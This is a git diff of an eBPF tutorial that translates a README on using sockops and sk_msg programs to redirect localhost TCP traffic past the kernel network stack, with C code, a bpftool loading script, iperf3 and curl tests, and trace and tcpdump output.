-这里 sock_map 是记录 socket 规则的关键部分,即根据当前的数据包信息,从 sock_map 中挑选一个存在的 socket 连接来转发请求。所以需要先在 sockops 的 hook 处或者其它地方,将 socket 信息保存到 sock_map,并提供一个规则 (一般为四元组) 根据 key 查找到 socket。 +Here, the `sock_map` is a key component that stores socket rules, i.e., it selects an existing socket connection from the `sock_map` based on the current packet information. Therefore, it is necessary to save the socket information to the `sock_map` at the hook of the sockops or elsewhere and provide a rule (usually a four-tuple) to find the socket based on the key. -Merbridge 项目就是这样实现了用 eBPF 代替 iptables 为 Istio 进行加速。在使用 Merbridge (eBPF) 优化之后,出入口流量会直接跳过很多内核模块,明显提高性能,如下图所示: +The Merbridge project has achieved acceleration for Istio by replacing iptables with eBPF. After using Merbridge (eBPF) optimization, the inbound and outbound traffic bypasses many kernel modules, significantly improving performance, as shown in the following diagram: ![merbridge](merbridge.png) -## 示例程序 +## Example Program -此示例程序从发送者的套接字(出口)重定向流量至接收者的套接字(入口),**跳过 TCP/IP 内核网络栈**。在这个示例中,我们假定发送者和接收者都在**同一台**机器上运行。这个示例程序有两个部分,它们共享一个 map 定义: +This example program redirects traffic from the sender’s socket (outgoing) to the recipient’s socket (incoming), bypassing the TCP/IP kernel network stack. In this example, we assume that the sender and recipient are both running on the **same** machine. This example program has two parts that share a map definition: bpf_sockmap.h @@ -47,19 +47,19 @@ struct { } sock_ops_map SEC(".maps"); ``` -这个示例程序中的 BPF 程序被分为两个部分 `bpf_redirect.bpf.c` 和 `bpf_contrack.bpf.c`。 +The BPF program in this example is divided into two parts: `bpf_redirect.bpf.c` and `bpf_contrack.bpf.c`. -- `bpf_contrack.bpf.c` 中的 BPF 代码定义了一个套接字操作(`sockops`)程序,它的功能主要是当本机(使用 localhost)上的任意 TCP 连接被创建时,根据这个新连接的五元组(源地址,目标地址,源端口,目标端口,协议),在 `sock_ops_map` 这个 BPF MAP 中创建一个条目。这个 BPF MAP 被定义为 `BPF_MAP_TYPE_SOCKHASH` 类型,可以存储套接字和对应的五元组。这样使得每当本地 TCP 连接被创建的时候,这个连接的五元组信息也能够在 BPF MAP 中找到。 +- The BPF code in `bpf_contrack.bpf.c` defines a socket operation (`sockops`) program, whose main function is to create an entry in the `sock_ops_map` BPF map in which it stores the five-tuple (source address, destination address, source port, destination port, protocol) for each new TCP connection established on the local machine (using localhost). This BPF map is defined as type `BPF_MAP_TYPE_SOCKHASH` and can store sockets and their corresponding five-tuple. This allows the five-tuple information of each local TCP connection to be found in the BPF map whenever the connection is created. -- `bpf_redirect.bpf.c` 中的 BPF 代码定义了一个网络消息 (sk_msg) 处理程序,当本地套接字上有消息到达时会调用这个程序。然后这个 sk_msg 程序检查该消息是否来自本地地址,如果是,根据获取的五元组信息(源地址,目标地址,源端口,目标端口,协议)在 `sock_ops_map` 查找相应的套接字,并将该消息重定向到在 `sock_ops_map` 中找到的套接字上,这样就实现了绕过内核网络栈。 +- The BPF code in `bpf_redirect.bpf.c` defines a sk_msg handler that is called when a message arrives on a local socket. The sk_msg program checks if the message is from a local address, and if so, it retrieves the five-tuple (source address, destination address, source port, destination port, protocol) from the message and looks up the corresponding socket in the `sock_ops_map` using the obtained key. Then, it redirects the message to the socket found in the `sock_ops_map`, thus bypassing the kernel network stack and directly delivering the message from the sender's socket to the receiver's socket. 
-举个例子,我们假设有两个进程在本地运行,进程 A 绑定在 8000 端口上,进程 B 绑定在 9000 端口上,进程 A 向进程 B 发送消息。 +For example, let's assume that there are two processes running locally, process A binds to port 8000, and process B binds to port 9000. Process A sends a message to process B. -1. 当进程 A 首次和进程 B 建立 TCP 连接时,触发 `bpf_contrack.bpf.c` 中的 `sockops` 程序,这个程序将五元组 `{127.0.0.1, 127.0.0.1, 8000, 9000, TCP}` 存入 `sock_ops_map`,值为进程 A 的套接字。 +1. When the TCP connection is first established between process A and process B, the `sockops` program in `bpf_contrack.bpf.c` is triggered, and it creates an entry in the `sock_ops_map` BPF map for the five-tuple `{127.0.0.1, 127.0.0.1, 8000, 9000, TCP}`, with the value being the socket of process A. -2. 当进程 A 发送消息时,触发 `bpf_redirect.bpf.c` 中的 `sk_msg` 程序,然后 `sk_msg` 程序将消息从进程 A 的套接字重定向到 `sock_ops_map` 中存储的套接字(进程 A 的套接字)上,因此,消息被直接从进程 A 输送到进程 B,绕过了内核网络栈。 +2. When process A sends a message, the `sk_msg` program in `bpf_redirect.bpf.c` is triggered, and it redirects the message from process A's socket to the socket stored in the `sock_ops_map` based on the obtained five-tuple information (source address, destination address, source port, destination port, protocol). As a result, the message is directly delivered from process A to process B, bypassing the kernel network stack. -这个示例程序就是通过 BPF 实现了在本地通信时,快速将消息从发送者的套接字重定向到接收者的套接字,从而绕过了内核网络栈,以提高传输效率。 +This example program uses BPF to efficiently redirect messages from the sender's socket to the recipient's socket during local communication, bypassing the kernel network stack to improve transmission efficiency. bpf_redirect.bpf.c @@ -96,9 +96,9 @@ SEC("sockops") int bpf_sockops_handler(struct bpf_sock_ops *skops){ u32 family, op; - family = skops->family; - op = skops->op; - if (op != BPF_SOCK_OPS_PASSIVE_ESTABLISHED_CB + family = skops->family; + op = skops->op; + if (op != BPF_SOCK_OPS_PASSIVE_ESTABLISHED_CB && op != BPF_SOCK_OPS_ACTIVE_ESTABLISHED_CB) { return BPF_OK; } @@ -107,7 +107,7 @@ int bpf_sockops_handler(struct bpf_sock_ops *skops){ return BPF_OK; } - struct sock_key key = { + struct sock_key key = { .dip = skops->remote_ip4, .sip = skops->local_ip4, .sport = bpf_htonl(skops->local_port), /* convert to network byte order */ @@ -115,31 +115,31 @@ int bpf_sockops_handler(struct bpf_sock_ops *skops){ .family = skops->family, }; - bpf_printk(">>> new connection: OP:%d, PORT:%d --> %d\n", op, bpf_ntohl(key.sport), bpf_ntohl(key.dport)); + bpf_printk(">>> new connection: OP:%d, PORT:%d --> %d\n", op, bpf_ntohl(key.sport), bpf_ntohl(key.dport)); - bpf_sock_hash_update(skops, &sock_ops_map, &key, BPF_NOEXIST); + bpf_sock_hash_update(skops, &sock_ops_map, &key, BPF_NOEXIST); return BPF_OK; } ``` -### 编译 eBPF 程序 +### Compiling the eBPF Program -这里我们使用 libbpf 编译这个 eBPF 程序。完整的源代码和工程可以在 中找到。关于如何安装依赖,请参考: +Here, we use libbpf to compile the eBPF program. The complete source code and project can be found at . 
```shell # Compile the bpf program with libbpf make ``` -### 加载 eBPF 程序 +### Loading the eBPF Program -我们编写了一个脚本来加载 eBPF 程序,它会自动加载两个 eBPF 程序并创建一个 BPF MAP: +We have created a script to load the eBPF program, which will automatically load both eBPF programs and create a BPF map: ```shell sudo ./load.sh ``` -这个脚本实际上完成了这些操作: +This script actually performs the following operations: ```sh #!/bin/bash @@ -164,24 +164,24 @@ sudo bpftool prog load bpf_redirect.bpf.o "/sys/fs/bpf/bpf_redir" map name sock_ sudo bpftool prog attach pinned /sys/fs/bpf/bpf_redir msg_verdict pinned /sys/fs/bpf/sock_ops_map ``` -这是一个 BPF 的加载脚本。它的主要功能是加载和附加 BPF 程序到内核系统中,并将关联的 BPF map 一并存储(pin)到 BPF 文件系统中,以便 BPF 程序能访问和操作这些 map。 +This is a script for loading BPF programs. Its main function is to load and attach BPF programs to the kernel system, and store the associated BPF maps in the BPF file system so that the BPF programs can access and operate on these maps. -让我们详细地看一下脚本的每一行是做什么的。 +Let's take a detailed look at what each line of the script does. -1. `sudo mount -t bpf bpf /sys/fs/bpf/` 这一行用于挂载 BPF 文件系统,使得 BPF 程序和相关的 map 可以被系统访问和操作。 -2. 判断条件 `[ -e "/sys/fs/bpf/bpf_sockops" ]` 是检查是否已经存在 `/sys/fs/bpf/bpf_sockops` 文件,如果存在,则说明 `bpf_sockops` 程序已经被加载到系统中,那么将会通过 `./unload.sh` 脚本将其卸载。 -3. `sudo bpftool prog load bpf_contrack.bpf.o /sys/fs/bpf/bpf_sockops type sockops pinmaps /sys/fs/bpf/` 这一行是加载上文中 `bpf_contrack.bpf.c` 编译得到的 BPF 对象文件 `bpf_contrack.bpf.o` 到 BPF 文件系统中,存储至 `/sys/fs/bpf/bpf_sockops`,并且指定它的类型为 `sockops`。`pinmaps /sys/fs/bpf/` 是指定将加载的 BPF 程序相关的 map 存储在 `/sys/fs/bpf/` 下。 -4. `sudo bpftool cgroup attach "/sys/fs/cgroup/" sock_ops pinned "/sys/fs/bpf/bpf_sockops"` 这一行是将已经加载到 BPF 文件系统的 `bpf_sockops` 程序附加到 cgroup(此路径为"/sys/fs/cgroup/")。附加后,所有属于这个 cgroup 的套接字操作都会受到 `bpf_sockops` 的影响。 -5. `sudo bpftool prog load bpf_redirect.bpf.o "/sys/fs/bpf/bpf_redir" map name sock_ops_map pinned "/sys/fs/bpf/sock_ops_map"` 这一行是加载 `bpf_redirect.bpf.c` 编译得到的 BPF 对象文件 `bpf_redirect.bpf.o` 到 BPF 文件系统中,存储至 `/sys/fs/bpf/bpf_redir` ,并且指定它的相关 map为 `sock_ops_map`,这个map在 `/sys/fs/bpf/sock_ops_map` 中。 -6. `sudo bpftool prog attach pinned /sys/fs/bpf/bpf_redir msg_verdict pinned /sys/fs/bpf/sock_ops_map` 这一行是将已经加载的 `bpf_redir` 附加到 `sock_ops_map` 上,附加方式为 `msg_verdict`,表示当该 map 对应的套接字收到消息时,将会调用 `bpf_redir` 程序处理。 +1. `sudo mount -t bpf bpf /sys/fs/bpf/` mounts the BPF file system, enabling access to and operation on BPF programs and related maps by the system. +2. The condition check `[ -e "/sys/fs/bpf/bpf_sockops" ]` checks whether the `/sys/fs/bpf/bpf_sockops` file already exists. If it does exist, it means that the `bpf_sockops` program has already been loaded into the system, so it will be uninstalled using the `./unload.sh` script. +3. `sudo bpftool prog load bpf_contrack.bpf.o /sys/fs/bpf/bpf_sockops type sockops pinmaps /sys/fs/bpf/` loads the BPF object file `bpf_contrack.bpf.o` compiled from the `bpf_contrack.bpf.c` into the BPF file system, storing it in `/sys/fs/bpf/bpf_sockops`, and specifying its type as `sockops`. `pinmaps /sys/fs/bpf/` specifies that the BPF maps associated with the loaded BPF program will be stored under `/sys/fs/bpf/`. +4. `sudo bpftool cgroup attach "/sys/fs/cgroup/" sock_ops pinned "/sys/fs/bpf/bpf_sockops"` attaches the `bpf_sockops` program that has been loaded into the BPF file system to the cgroup (the path is `"/sys/fs/cgroup/"`). After the attachment, all socket operations belonging to this cgroup will be affected by the `bpf_sockops` program. +5. 
`sudo bpftool prog load bpf_redirect.bpf.o "/sys/fs/bpf/bpf_redir" map name sock_ops_map pinned "/sys/fs/bpf/sock_ops_map"` loads the BPF object file `bpf_redirect.bpf.o` compiled from `bpf_redirect.bpf.c` into the BPF file system, storing it in `/sys/fs/bpf/bpf_redir`, and specifying the associated map as `sock_ops_map`, which is located in `/sys/fs/bpf/sock_ops_map`. +6. `sudo bpftool prog attach pinned /sys/fs/bpf/bpf_redir msg_verdict pinned /sys/fs/bpf/sock_ops_map` attaches the already loaded `bpf_redir` program to the `sock_ops_map` using the `msg_verdict` attachment type, which means that when the socket associated with this map receives a message, the `bpf_redir` program will be called to handle it. -综上,此脚本的主要作用就是将两个用于处理本地套接字流量的 BPF 程序分别加载到系统并附加到正确的位置,以便它们能被正确地调用,并且确保它们可以访问和操作相关的 BPF map。 +In summary, the main function of this script is to load the two BPF programs used to process local socket traffic into the system and attach them to the correct locations so that they can be correctly called, ensuring that they can access and manipulate the associated BPF maps. -您可以使用 [bpftool utility](https://github.com/torvalds/linux/blob/master/tools/bpf/bpftool/Documentation/bpftool-prog.rst) 检查这两个 eBPF 程序是否已经加载。 +You can use the [bpftool utility](https://github.com/torvalds/linux/blob/master/tools/bpf/bpftool/Documentation/bpftool-prog.rst) to check if these two eBPF programs have been loaded. ```console $ sudo bpftool prog show -63: sock_ops name bpf_sockops_handler tag 275467be1d69253d gpl +63: sock_ops name bpf_sockmap tag 275467be1d69253d gpl loaded_at 2019-01-24T13:07:17+0200 uid 0 xlated 1232B jited 750B memlock 4096B map_ids 58 64: sk_msg name bpf_redir tag bc78074aa9dd96f4 gpl @@ -189,69 +189,71 @@ $ sudo bpftool prog show xlated 304B jited 233B memlock 4096B map_ids 58 ``` -### 使用 iperf3 或 curl 进行测试 +### Test with iperf3 or curl -运行 [iperf3](https://iperf.fr/) 服务器 +See to install iperf3. + +Running the iperf3 Server: ```shell iperf3 -s -p 5001 ``` -运行 [iperf3](https://iperf.fr/) 客户端 +Running the iperf3 Client: ```shell iperf3 -c 127.0.0.1 -t 10 -l 64k -p 5001 ``` -或者也可以用 Python 和 curl 进行测试: +Or you can use curl and python: ```sh python3 -m http.server curl http://0.0.0.0:8000/ ``` -### 收集追踪 +### Collecting Traces -查看``sock_ops``追踪本地连接建立 +Check the `sock_ops` trace for local connection establishments. ```console -$ ./trace_bpf_output.sh # 实际上就是 sudo cat /sys/kernel/debug/tracing/trace_pipe +$ ./trace_bpf_output.sh # which is basically sudo cat /sys/kernel/debug/tracing/trace_pipe iperf3-9516 [001] .... 22500.634108: 0: <<< ipv4 op = 4, port 18583 --> 4135 iperf3-9516 [001] ..s1 22500.634137: 0: <<< ipv4 op = 5, port 4135 --> 18583 iperf3-9516 [001] .... 22500.634523: 0: <<< ipv4 op = 4, port 19095 --> 4135 iperf3-9516 [001] ..s1 22500.634536: 0: <<< ipv4 op = 5, port 4135 --> 19095 ``` -当iperf3 -c建立连接后,你应该可以看到上述用于套接字建立的事件。如果你没有看到任何事件,那么 eBPF 程序可能没有正确地附加上。 +When the connection is established between `iperf3 -c` and the server, you should see the events above for socket establishment. If you don't see any events, then the eBPF programs may not have been attached correctly. -此外,当``sk_msg``生效后,可以发现当使用 tcpdump 捕捉本地lo设备流量时,只能捕获三次握手和四次挥手流量,而iperf数据流量没有被捕获到。如果捕获到iperf数据流量,那么 eBPF 程序可能没有正确地附加上。 +Furthermore, when `sk_msg` takes effect, you should observe that when capturing local traffic on the loopback interface using tcpdump, only the three-way handshake and four-way termination traffic are captured, and the actual data flow of iperf is not captured. 
If the iperf data flow is captured, then the eBPF programs may not have been attached correctly. ```console $ ./trace_lo_traffic.sh # tcpdump -i lo port 5001 -# 三次握手 +# Three-way handshake 13:24:07.181804 IP localhost.46506 > localhost.5001: Flags [S], seq 620239881, win 65495, options [mss 65495,sackOK,TS val 1982813394 ecr 0,nop,wscale 7], length 0 13:24:07.181815 IP localhost.5001 > localhost.46506: Flags [S.], seq 1084484879, ack 620239882, win 65483, options [mss 65495,sackOK,TS val 1982813394 ecr 1982813394,nop,wscale 7], length 0 13:24:07.181832 IP localhost.46506 > localhost.5001: Flags [.], ack 1, win 512, options [nop,nop,TS val 1982813394 ecr 1982813394], length 0 -# 四次挥手 +# Four-way termination 13:24:12.475649 IP localhost.46506 > localhost.5001: Flags [F.], seq 1, ack 1, win 512, options [nop,nop,TS val 1982818688 ecr 1982813394], length 0 13:24:12.479621 IP localhost.5001 > localhost.46506: Flags [.], ack 2, win 512, options [nop,nop,TS val 1982818692 ecr 1982818688], length 0 13:24:12.481265 IP localhost.5001 > localhost.46506: Flags [F.], seq 1, ack 2, win 512, options [nop,nop,TS val 1982818694 ecr 1982818688], length 0 13:24:12.481270 IP localhost.46506 > localhost.5001: Flags [.], ack 2, win 512, options [nop,nop,TS val 1982818694 ecr 1982818694], length 0 ``` -### 卸载 eBPF 程序 +### Unloading the eBPF Program ```shell sudo ./unload.sh ``` -## 参考资料 +## References -最后,如果您对 eBPF 技术感兴趣,并希望进一步了解和实践,可以访问我们的教程代码仓库 和教程网站 +Finally, if you are interested in eBPF technology and want to learn more and practice further, you can visit our tutorial code repository at and the tutorial website at . - - -> 原文地址: 转载请注明出处。 +> The original link of this article: diff --git a/src/29-sockops/README.zh.md b/src/29-sockops/README.zh.md new file mode 100644 index 0000000..c320e85 --- /dev/null +++ b/src/29-sockops/README.zh.md @@ -0,0 +1,257 @@ +# eBPF 开发实践:使用 sockops 加速网络请求转发 + +eBPF(扩展的伯克利数据包过滤器)是 Linux 内核中的一个强大功能,可以在无需更改内核源代码或重启内核的情况下,运行、加载和更新用户定义的代码。这种功能让 eBPF 在网络和系统性能分析、数据包过滤、安全策略等方面有了广泛的应用。 + +本教程将关注 eBPF 在网络领域的应用,特别是如何使用 sockops 类型的 eBPF 程序来加速本地网络请求的转发。这种应用通常在使用软件负载均衡器进行请求转发的场景中很有价值,比如使用 Nginx 或 HAProxy 之类的工具。 + +在许多工作负载中,如微服务架构下的服务间通信,通过本机进行的网络请求的性能开销可能会对整个应用的性能产生显著影响。由于这些请求必须经过本机的网络栈,其处理性能可能会成为瓶颈,尤其是在高并发的场景下。为了解决这个问题,sockops 类型的 eBPF 程序可以用于加速本地的请求转发。sockops 程序可以在内核空间管理套接字,实现在本机上的套接字之间直接转发数据包,从而降低了在 TCP/IP 栈中进行数据包转发所需的 CPU 时间。 + +本教程将会通过一个具体的示例演示如何使用 sockops 类型的 eBPF 程序来加速网络请求的转发。为了让你更好地理解如何使用 sockops 程序,我们将逐步介绍示例程序的代码,并讨论每个部分的工作原理。完整的源代码和工程可以在 中找到。 + +## 利用 eBPF 的 sockops 进行性能优化 + +网络连接本质上是 socket 之间的通讯,eBPF 提供了一个 [bpf_msg_redirect_hash](https://man7.org/linux/man-pages/man7/bpf-helpers.7.html) 函数,用来将应用发出的包直接转发到对端的 socket,可以极大地加速包在内核中的处理流程。 + +这里 sock_map 是记录 socket 规则的关键部分,即根据当前的数据包信息,从 sock_map 中挑选一个存在的 socket 连接来转发请求。所以需要先在 sockops 的 hook 处或者其它地方,将 socket 信息保存到 sock_map,并提供一个规则 (一般为四元组) 根据 key 查找到 socket。 + +Merbridge 项目就是这样实现了用 eBPF 代替 iptables 为 Istio 进行加速。在使用 Merbridge (eBPF) 优化之后,出入口流量会直接跳过很多内核模块,明显提高性能,如下图所示: + +![merbridge](merbridge.png) + +## 示例程序 + +此示例程序从发送者的套接字(出口)重定向流量至接收者的套接字(入口),**跳过 TCP/IP 内核网络栈**。在这个示例中,我们假定发送者和接收者都在**同一台**机器上运行。这个示例程序有两个部分,它们共享一个 map 定义: + +bpf_sockmap.h + +```c +#include "vmlinux.h" +#include +#include + +#define LOCALHOST_IPV4 16777343 + +struct sock_key { + __u32 sip; + __u32 dip; + __u32 sport; + __u32 dport; + __u32 family; +}; + +struct { + __uint(type, BPF_MAP_TYPE_SOCKHASH); + __uint(max_entries, 65535); + __type(key, struct sock_key); + __type(value, int); +} sock_ops_map SEC(".maps"); +``` + +这个示例程序中的 BPF 程序被分为两个部分 `bpf_redirect.bpf.c` 和 
`bpf_contrack.bpf.c`。 + +- `bpf_contrack.bpf.c` 中的 BPF 代码定义了一个套接字操作(`sockops`)程序,它的功能主要是当本机(使用 localhost)上的任意 TCP 连接被创建时,根据这个新连接的五元组(源地址,目标地址,源端口,目标端口,协议),在 `sock_ops_map` 这个 BPF MAP 中创建一个条目。这个 BPF MAP 被定义为 `BPF_MAP_TYPE_SOCKHASH` 类型,可以存储套接字和对应的五元组。这样使得每当本地 TCP 连接被创建的时候,这个连接的五元组信息也能够在 BPF MAP 中找到。 + +- `bpf_redirect.bpf.c` 中的 BPF 代码定义了一个网络消息 (sk_msg) 处理程序,当本地套接字上有消息到达时会调用这个程序。然后这个 sk_msg 程序检查该消息是否来自本地地址,如果是,根据获取的五元组信息(源地址,目标地址,源端口,目标端口,协议)在 `sock_ops_map` 查找相应的套接字,并将该消息重定向到在 `sock_ops_map` 中找到的套接字上,这样就实现了绕过内核网络栈。 + +举个例子,我们假设有两个进程在本地运行,进程 A 绑定在 8000 端口上,进程 B 绑定在 9000 端口上,进程 A 向进程 B 发送消息。 + +1. 当进程 A 首次和进程 B 建立 TCP 连接时,触发 `bpf_contrack.bpf.c` 中的 `sockops` 程序,这个程序将五元组 `{127.0.0.1, 127.0.0.1, 8000, 9000, TCP}` 存入 `sock_ops_map`,值为进程 A 的套接字。 + +2. 当进程 A 发送消息时,触发 `bpf_redirect.bpf.c` 中的 `sk_msg` 程序,然后 `sk_msg` 程序将消息从进程 A 的套接字重定向到 `sock_ops_map` 中存储的套接字(进程 A 的套接字)上,因此,消息被直接从进程 A 输送到进程 B,绕过了内核网络栈。 + +这个示例程序就是通过 BPF 实现了在本地通信时,快速将消息从发送者的套接字重定向到接收者的套接字,从而绕过了内核网络栈,以提高传输效率。 + +bpf_redirect.bpf.c + +```c +#include "bpf_sockmap.h" + +char LICENSE[] SEC("license") = "Dual BSD/GPL"; + +SEC("sk_msg") +int bpf_redir(struct sk_msg_md *msg) +{ + if(msg->remote_ip4 != LOCALHOST_IPV4 || msg->local_ip4!= LOCALHOST_IPV4) + return SK_PASS; + + struct sock_key key = { + .sip = msg->remote_ip4, + .dip = msg->local_ip4, + .dport = bpf_htonl(msg->local_port), /* convert to network byte order */ + .sport = msg->remote_port, + .family = msg->family, + }; + return bpf_msg_redirect_hash(msg, &sock_ops_map, &key, BPF_F_INGRESS); +} +``` + +bpf_contrack.bpf.c + +```c +#include "bpf_sockmap.h" + +char LICENSE[] SEC("license") = "Dual BSD/GPL"; + +SEC("sockops") +int bpf_sockops_handler(struct bpf_sock_ops *skops){ + u32 family, op; + + family = skops->family; + op = skops->op; + if (op != BPF_SOCK_OPS_PASSIVE_ESTABLISHED_CB + && op != BPF_SOCK_OPS_ACTIVE_ESTABLISHED_CB) { + return BPF_OK; + } + + if(skops->remote_ip4 != LOCALHOST_IPV4 || skops->local_ip4!= LOCALHOST_IPV4) { + return BPF_OK; + } + + struct sock_key key = { + .dip = skops->remote_ip4, + .sip = skops->local_ip4, + .sport = bpf_htonl(skops->local_port), /* convert to network byte order */ + .dport = skops->remote_port, + .family = skops->family, + }; + + bpf_printk(">>> new connection: OP:%d, PORT:%d --> %d\n", op, bpf_ntohl(key.sport), bpf_ntohl(key.dport)); + + bpf_sock_hash_update(skops, &sock_ops_map, &key, BPF_NOEXIST); + return BPF_OK; +} +``` + +### 编译 eBPF 程序 + +这里我们使用 libbpf 编译这个 eBPF 程序。完整的源代码和工程可以在 中找到。关于如何安装依赖,请参考: + +```shell +# Compile the bpf program with libbpf +make +``` + +### 加载 eBPF 程序 + +我们编写了一个脚本来加载 eBPF 程序,它会自动加载两个 eBPF 程序并创建一个 BPF MAP: + +```shell +sudo ./load.sh +``` + +这个脚本实际上完成了这些操作: + +```sh +#!/bin/bash +set -x +set -e + +sudo mount -t bpf bpf /sys/fs/bpf/ + +# check if old program already loaded +if [ -e "/sys/fs/bpf/bpf_sockops" ]; then + echo ">>> bpf_sockops already loaded, uninstalling..." + ./unload.sh + echo ">>> old program already deleted..." 
+fi + +# load and attach sock_ops program +sudo bpftool prog load bpf_contrack.bpf.o /sys/fs/bpf/bpf_sockops type sockops pinmaps /sys/fs/bpf/ +sudo bpftool cgroup attach "/sys/fs/cgroup/" sock_ops pinned "/sys/fs/bpf/bpf_sockops" + +# load and attach sk_msg program +sudo bpftool prog load bpf_redirect.bpf.o "/sys/fs/bpf/bpf_redir" map name sock_ops_map pinned "/sys/fs/bpf/sock_ops_map" +sudo bpftool prog attach pinned /sys/fs/bpf/bpf_redir msg_verdict pinned /sys/fs/bpf/sock_ops_map +``` + +这是一个 BPF 的加载脚本。它的主要功能是加载和附加 BPF 程序到内核系统中,并将关联的 BPF map 一并存储(pin)到 BPF 文件系统中,以便 BPF 程序能访问和操作这些 map。 + +让我们详细地看一下脚本的每一行是做什么的。 + +1. `sudo mount -t bpf bpf /sys/fs/bpf/` 这一行用于挂载 BPF 文件系统,使得 BPF 程序和相关的 map 可以被系统访问和操作。 +2. 判断条件 `[ -e "/sys/fs/bpf/bpf_sockops" ]` 是检查是否已经存在 `/sys/fs/bpf/bpf_sockops` 文件,如果存在,则说明 `bpf_sockops` 程序已经被加载到系统中,那么将会通过 `./unload.sh` 脚本将其卸载。 +3. `sudo bpftool prog load bpf_contrack.bpf.o /sys/fs/bpf/bpf_sockops type sockops pinmaps /sys/fs/bpf/` 这一行是加载上文中 `bpf_contrack.bpf.c` 编译得到的 BPF 对象文件 `bpf_contrack.bpf.o` 到 BPF 文件系统中,存储至 `/sys/fs/bpf/bpf_sockops`,并且指定它的类型为 `sockops`。`pinmaps /sys/fs/bpf/` 是指定将加载的 BPF 程序相关的 map 存储在 `/sys/fs/bpf/` 下。 +4. `sudo bpftool cgroup attach "/sys/fs/cgroup/" sock_ops pinned "/sys/fs/bpf/bpf_sockops"` 这一行是将已经加载到 BPF 文件系统的 `bpf_sockops` 程序附加到 cgroup(此路径为"/sys/fs/cgroup/")。附加后,所有属于这个 cgroup 的套接字操作都会受到 `bpf_sockops` 的影响。 +5. `sudo bpftool prog load bpf_redirect.bpf.o "/sys/fs/bpf/bpf_redir" map name sock_ops_map pinned "/sys/fs/bpf/sock_ops_map"` 这一行是加载 `bpf_redirect.bpf.c` 编译得到的 BPF 对象文件 `bpf_redirect.bpf.o` 到 BPF 文件系统中,存储至 `/sys/fs/bpf/bpf_redir` ,并且指定它的相关 map为 `sock_ops_map`,这个map在 `/sys/fs/bpf/sock_ops_map` 中。 +6. `sudo bpftool prog attach pinned /sys/fs/bpf/bpf_redir msg_verdict pinned /sys/fs/bpf/sock_ops_map` 这一行是将已经加载的 `bpf_redir` 附加到 `sock_ops_map` 上,附加方式为 `msg_verdict`,表示当该 map 对应的套接字收到消息时,将会调用 `bpf_redir` 程序处理。 + +综上,此脚本的主要作用就是将两个用于处理本地套接字流量的 BPF 程序分别加载到系统并附加到正确的位置,以便它们能被正确地调用,并且确保它们可以访问和操作相关的 BPF map。 + +您可以使用 [bpftool utility](https://github.com/torvalds/linux/blob/master/tools/bpf/bpftool/Documentation/bpftool-prog.rst) 检查这两个 eBPF 程序是否已经加载。 + +```console +$ sudo bpftool prog show +63: sock_ops name bpf_sockops_handler tag 275467be1d69253d gpl + loaded_at 2019-01-24T13:07:17+0200 uid 0 + xlated 1232B jited 750B memlock 4096B map_ids 58 +64: sk_msg name bpf_redir tag bc78074aa9dd96f4 gpl + loaded_at 2019-01-24T13:07:17+0200 uid 0 + xlated 304B jited 233B memlock 4096B map_ids 58 +``` + +### 使用 iperf3 或 curl 进行测试 + +运行 [iperf3](https://iperf.fr/) 服务器 + +```shell +iperf3 -s -p 5001 +``` + +运行 [iperf3](https://iperf.fr/) 客户端 + +```shell +iperf3 -c 127.0.0.1 -t 10 -l 64k -p 5001 +``` + +或者也可以用 Python 和 curl 进行测试: + +```sh +python3 -m http.server +curl http://0.0.0.0:8000/ +``` + +### 收集追踪 + +查看``sock_ops``追踪本地连接建立 + +```console +$ ./trace_bpf_output.sh # 实际上就是 sudo cat /sys/kernel/debug/tracing/trace_pipe +iperf3-9516 [001] .... 22500.634108: 0: <<< ipv4 op = 4, port 18583 --> 4135 +iperf3-9516 [001] ..s1 22500.634137: 0: <<< ipv4 op = 5, port 4135 --> 18583 +iperf3-9516 [001] .... 
22500.634523: 0: <<< ipv4 op = 4, port 19095 --> 4135 +iperf3-9516 [001] ..s1 22500.634536: 0: <<< ipv4 op = 5, port 4135 --> 19095 +``` + +当iperf3 -c建立连接后,你应该可以看到上述用于套接字建立的事件。如果你没有看到任何事件,那么 eBPF 程序可能没有正确地附加上。 + +此外,当``sk_msg``生效后,可以发现当使用 tcpdump 捕捉本地lo设备流量时,只能捕获三次握手和四次挥手流量,而iperf数据流量没有被捕获到。如果捕获到iperf数据流量,那么 eBPF 程序可能没有正确地附加上。 + +```console +$ ./trace_lo_traffic.sh # tcpdump -i lo port 5001 + +# 三次握手 +13:24:07.181804 IP localhost.46506 > localhost.5001: Flags [S], seq 620239881, win 65495, options [mss 65495,sackOK,TS val 1982813394 ecr 0,nop,wscale 7], length 0 +13:24:07.181815 IP localhost.5001 > localhost.46506: Flags [S.], seq 1084484879, ack 620239882, win 65483, options [mss 65495,sackOK,TS val 1982813394 ecr 1982813394,nop,wscale 7], length 0 +13:24:07.181832 IP localhost.46506 > localhost.5001: Flags [.], ack 1, win 512, options [nop,nop,TS val 1982813394 ecr 1982813394], length 0 + +# 四次挥手 +13:24:12.475649 IP localhost.46506 > localhost.5001: Flags [F.], seq 1, ack 1, win 512, options [nop,nop,TS val 1982818688 ecr 1982813394], length 0 +13:24:12.479621 IP localhost.5001 > localhost.46506: Flags [.], ack 2, win 512, options [nop,nop,TS val 1982818692 ecr 1982818688], length 0 +13:24:12.481265 IP localhost.5001 > localhost.46506: Flags [F.], seq 1, ack 2, win 512, options [nop,nop,TS val 1982818694 ecr 1982818688], length 0 +13:24:12.481270 IP localhost.46506 > localhost.5001: Flags [.], ack 2, win 512, options [nop,nop,TS val 1982818694 ecr 1982818694], length 0 +``` + +### 卸载 eBPF 程序 + +```shell +sudo ./unload.sh +``` + +## 参考资料 + +最后,如果您对 eBPF 技术感兴趣,并希望进一步了解和实践,可以访问我们的教程代码仓库 和教程网站 + +- +- + +> 原文地址: 转载请注明出处。 diff --git a/src/29-sockops/README_en.md b/src/29-sockops/README_en.md deleted file mode 100644 index 8548b9f..0000000 --- a/src/29-sockops/README_en.md +++ /dev/null @@ -1,259 +0,0 @@ -# eBPF Development Practices: Accelerating Network Request Forwarding with Sockops - -eBPF (Extended Berkeley Packet Filter) is a powerful feature in the Linux kernel that allows running, loading, and updating user-defined code without the need to modify the kernel source code or reboot the kernel. This capability makes eBPF widely used in various areas such as network and system performance analysis, packet filtering, security policies, etc. - -This tutorial will focus on the application of eBPF in the networking domain, specifically how to use sockops-type eBPF programs to accelerate the forwarding of local network requests. This application is often valuable in scenarios where software load balancers are used for request forwarding, such as using tools like Nginx or HAProxy. - -In many workloads, such as inter-service communication in a microservices architecture, the performance overhead of network requests made through the loopback interface can significantly impact the overall application performance. Since these requests have to go through the local network stack, their processing performance can become a bottleneck, especially in high-concurrency scenarios. To address this issue, sockops-type eBPF 